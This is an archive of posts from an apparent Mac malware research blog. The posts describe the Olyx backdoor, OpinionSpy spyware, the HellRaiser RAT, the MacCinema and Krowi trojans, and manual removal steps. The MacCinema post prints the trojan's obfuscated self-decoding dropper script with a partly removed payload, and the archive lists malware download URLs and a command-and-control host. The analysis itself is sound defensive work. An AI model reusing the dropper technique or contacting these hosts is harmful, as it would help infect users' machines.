Archive
Backdoor ‘Olyx’
In my last blog post, I’ve discussed the early features of RAT ‘Blackhole’. Although, it was then in its early stage, I find this type of offensive development interesting due to the fact that they emerge and distribute as a hacking tool, with functional backdoor client-server mechanism.
Last month, we have spotted a new piece of malware, a backdoor server called ‘Olyx’. The file is a Mach-O binary and the traces of the working directory suggest that the Mac user name is ‘yxl’. So, this is where the name ‘Olyx’ came.
Backdoor ‘Olyx’ was spotted in a package called ‘PortalCurrent events-2009 July 5.rar”, where the content suggest that it was extracted from Wikipedia community portal current events 2009 July 5 page. If you will visit the Wikipedia current events 2009 July 5 page, and compare the screenshot below, you’ll find it very similar.
However, the extracted page includes a folder which contains photos of the 2011 June 15th protest in Athens, Greece and alongside the two malicious binary executable:
There’s another folder called ‘Photo-Current events 2009 July 5′, which contains 21 (disturbing) photos.
Q: So, the question now is, what happened on ’2009 July 5′ ?
The World Uyghur Congress website describes it,
On 5 July 2009, Uyghurs in Urumqi, the capital of East Turkestan, staged a peaceful protest which was suppressed by Chinese security forces and subsequently led to ethnic unrest in the city that left hundreds of people dead.
Q: Ok, that was 2 years ago right?
Yes, and in a press released titled “Worldwide Uyghur Protests on Second Anniversary of 5 July 2009″ describes the present,
On July 5, 2011 and in the days surrounding July 5th, the WUC called the Uyghurs in exile and their supporters around the globe to stage demonstrations and other actions to commemorate the second anniversary of one of the saddest and most tragic days in the history of the Uyghur people and of East Turkestan and to ensure that the world does not forget about the devastating plight of the Uyghur people.
So, there’s a call for an organized demonstration to remind the whole world of the 2009 event, and in support for Uyghur’s human rights and freedom.
Q: What’s the protest? This Facebook invitation page explains,
Approaching the second anniversary of these events, and despite international calls, no independent investigation into the incident has been allowed by the Chinese authorities and the number of people killed, detained, imprisoned, executed and disappeared remains unclear.
The activities surrounding this protest clearly took place in the cyberspace, resulting to attacks as described in press released titled World Uyghur Congress (WUC) Victim of DDoS Cyber Attacks,
Approaching the second anniversary of the 5 July 2009 events, the World Uyghur Congress (WUC) has again been the victim of cyber attacks.
So, how do you think Backdoor ‘Olyx’ fits in this picture?
The discovery of this threat should remind Mac users to carefully consider security and the real-life consequences of getting pwned. Remember, this type of threats are on the mission, and this is not cybercriminal that monetize infection nor steals money.
How to Remove Starfield
1) Kill the running process.
Using spotlight, type-in Activity Monitor and filter by searching starfieldUpdate and click Quit Process. Then, search offSyncService and click Quit Process.
If using Terminal, you may run the following command:
2) Delete Starfield internet plugins and components.
Using Terminal, you may run the following command:
3) It will require root password to remove the following files.
This instruction removes all the traces of Starfield. Stay safe!
**Note: If you find Starfield application useful, you may keep the ‘WBE Desktop Notified.App’ and ‘DesktopTools.App’.
“PremierOpinion” Spyware Now in Mac OS X
From Intego security advisory today:
——————————————————————————————————–
Malware: OSX/OpinionSpy
Risk: High
Description: Intego has discovered a spyware application that is installed by a number of freely distributed Mac applications and screen savers found on a variety of websites.
Who’s PremierOpinion?
PremierOpinion is part of an online market research community with over 2 million members worldwide. PremierOpinion relies on its members to gain valuable insight into Internet trends and behavior. In exchange for participating in periodic surveys on topics of interest to the Internet community, and for having their Internet browsing and purchasing activity monitored, PremierOpinion sponsors select software that its members can enjoy for free.
Website: http://www.premieropinion.com/Home.aspx
So, who’s the partner?
“PremierOpinion” Mac OS X Spyware are distributed by 7art-screensavers and published in this link: http://7art-screensavers.com/Mac_OS_X.shtml
Intego blog published detailed list of “PremierOpinion” Mac OS X Spyware.[here]
There are 48 screensaver Mac OS X apps in this source, and there are two different packages.
How to spot “PremierOpinion” Mac OS X Spyware?
1. It uses IzPack “Package once. Deploy everywhere.” software installer generator. You’ll notice from a package inspection (press control+click on the application and from the pop-up menu choose ‘Show Package Contents’), the icons are different – 7art while the other izpack.icns.
2. IzPack generated installers are in Java Archive (.JAR) file.
3. 7art screen savers installation do NOT require root password. While, PremierOpinion sponsored free software or application requires root password. Why? Because it installs spyware, which will track and monitor users’ browsing behaviour, scans and gather information from the disk and sends back to its remote server. This is very persistent spyware, meaning it does NOT want to be uninstalled.
4. Spyware installs software without user’s consent or notification. It is often bundled with other clean application to misleads users of its true purpose and gain access to users’ system. So, in this case, if you click “Cancel”, the IzPack installer will still continue by two pop-up screen: 1) PremierOpinion survey (screenshot) 2) 7art screen saver installation (screenshot).
“Package once. Deploy everywhere.”
This sneaky Mac OS X threat could be everywhere bundled and distributed in the internet.
Be cautious and stay safe!
——–> Threat Info FYI
File Name: poinstaller
File Type: Mach-O executable i386
File Size: 470,352 bytes
Threat Type: Backdoor, Downloader, Sniffer, Stealer,
Installation Requirement: root
Remote Activity: Installation of other threats
Remote Download File: Rule14.xml
Remote Download: PermissionResearch.zip
Installation: RunPermissionResearch.sh
Package Name: PermissionResearch.app
File Name: PermissionResearch
File Type: Mach-O executable i386
File Name: macmeterhkRAT for Mac
RAT for Mac?
When there’s too much RAT (Remote Administration Tool) available for Windows, people wonder if there’s good and useful RAT for Mac as well.
The search and discussions about this topic goes on and on; at one point an online poll favored to continue the development:
A useful description of RATs that works in OSX can be found here.
The most recent/updated development is HellRaiser version 4.2, coded by DCHKG an Underground Mac Programming Team.
HellRaiser includes a configuration component, where the remote controller can specify the server parameters.
The server component is the application distributed to target OS X user. It requires manual execution to install and enable the server to run in background (hidden from dock). Once successful, the server component (or the slave) will report back to the master as shown below.
This is the same version that Intego recently discovered in-the-wild disguised as iPhoto installer.
How would I know if HellRaiser server is installed/running?
option 1: You may open network utility and activity monitor (/Applications/Utilities/) and kill the process.
option 2: You may open terminal, and type lsof -i (this will list running processes and its matching network/internet connection). Search dubious name and internet connection, take note of the PID, and in terminal type kill -9 <PID> (this will kill the process).
If you’re using Mac security scanner, then it’s best time to check for signature update! (most vendors detects this as OSX HellRTS)
Updated MacCinema
Last week, I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.
The script looks like this:
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.
Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below. 
…while other links to Mac videos like this PornTube below.
There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
This instruction has been previously discussed here.
Stay safe!
MacCinema slight modification
A slightly modified variant of MacCinema was spotted in “MacPlay.dmg”. Once you execute it, it will still display MacCinema installer. However, few modification was found in preinstall & preupgrade scripts as shown in Figure 01.
Obviously, attackers are trying to maximize these threats. The obfuscated data will extract another script, which we already seen it from previous variant.
This Trojan has been in-the-wild for months now and as it continuously proliferates in the internet, new Macintosh users are often found falling into its tricks.
Stay away from this threat!
“MacCinema” update …
Another modified version of “MacCinema” promising as a crack version of “Avid.Xpress.Pro.5.7.2.dmg”.
This variant was recently added by MacScan, if you’re using it – do a regular check here -> http://macscan.securemac.com/spyware-list
Also, recently blogged by Intego @ http://blog.intego.com/
What’s new? Nothing really except this few strings “yksrepsak 777 nigeb”
…which means, “begin 777 kaspersky”.
“enialbdivad 777 nigeb” remains the same as discussed from the previous post “Latest Threat: MacCinema“.
The bottom line here is that these threats are active and in-the-wild. It is trying to play hide-n-seek with security scanners by applying obfuscation and changing few strings.
To remove this threat, just follow MacAccess removal instruction.
Stay alert and always be informed!
Bloated Fish
This is the picture after visualizing data gathered from one malicious node <75.126.154.249>. Hundred of active domain names shares this IP address as denoted by green line. The red lines inside the body of “Bloated Fish” denotes as malicious links. These red lines is connected to the fish pink and red lips noted as “http://self-relax-massage.com/relax/in.cgi?” As of the moment, the malicious server leads to its payload – “http://great2008x.com/great/pdf.php?id”. This generates an exploited PDF that installs EXE targetting users who’s default browser opens Adobe Reader automatically.
As observed and several times mentioned, these malicious PDFs are quietly increasing in numbers however recently there has been a significant increase due to implementation of PHP PDF – apparently, a server side polymorphism which means that generated PDF changes everytime. This makes difficult for most security scanners that relies on specific file detection.
Notice the fish tail, there is few red lines leading to “MacAccess” trojan. As of writing, they all point to “http://opera-power.com/download/7946645975673d6cc63775/flashcodec.dmg”. As usual, it disguises as a fake codec. Here’s an example below…
“These bloated fish calls cloud as their home.”
Latest OS X threat Krowi installs “DivX”
Latest update of threat Krowi was found in Adobe Photoshop cracker installer.
Not much difference with “iWorkServices” except with the repackaging and name. However, this should serve as a reminder to be extra careful in downloading stuff!
Once installed, you’ll find these files and port activity below.
How to Remove? It’s the same as the previous instruction except that you have to change the name from “iWorkServices” to “DivX”.
How To Remove “iWorkServices”
I noticed that few traffics coming in are looking on how to remove “iWorkServices”.
So, here’s a manual or ”Do It Yourself” steps:
Open Terminal – > /Application/Utilities/Terminal.app
Check if “iWorkServices” is running, to do you can choose any of the options below:
**Note: These commands requires root privileges to execute, to avoid re-entering your password everytime type – > ”sudo su“.
- Check for “iworkservices” running process by typing “lsof -c iwork” or “lsof -c iWork“, just check which one works for you.
Monitoring ” iWorkServices” background activity, you will notice TCP connections changes as it tries to communicate to 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024.
1.1 If you know the PID or process ID then typing “lsof -p <PID>” will also give the same result.
2. Since we already confirmed the presence of this threat in the system, you could start removing them through executing the following commands:
rm -rf /System/Library/StartupItems/iWorkServices
rm /usr/bin/iWorkServices
rm /private/tmp/.iWorkServices
rm -rf /Library/Receipts/iWorkServices.pkg
killall -9 iWorkServices
2.1 Or you can copy the same instruction and make a small bash script, as exampled below:
#!/bin/bash
#This is a simple script to delete iworkservices files terminate running process
rm -rf /System/Library/StartupItems/iWorkServices
rm /usr/bin/iWorkServices
rm /private/tmp/.iWorkServices
rm -rf /Library/Receipts/iWorkServices.pkg
killall -9 iWorkServices
exit
You can write these instructions to any text editor like TextEdit (/Applications/TextEdit.app).
Open terminal and type “chmod +rwx <filename>” as exampled below. **Notice that I am root user here, so don’t forget to type “sudo su“, so your script will execute properly.**
Please feel free to drop a message and hopefully with additional information such as:
- How did you get infected ? (website? )
- Do you still have a copy of the application you installed ? If yes, please send it to this email address: meths101 (at) optusnet (dot) com (dot) au ; or just send me a link where I can download it.
- Any unusual behavior found in your computer.
Happy Holidays!!! –> As of writing, it is a nice sunny “Australian day” today and I still feel sleepy for watching Australian Open last night. It was fun and amazing crowd!
Recent Comments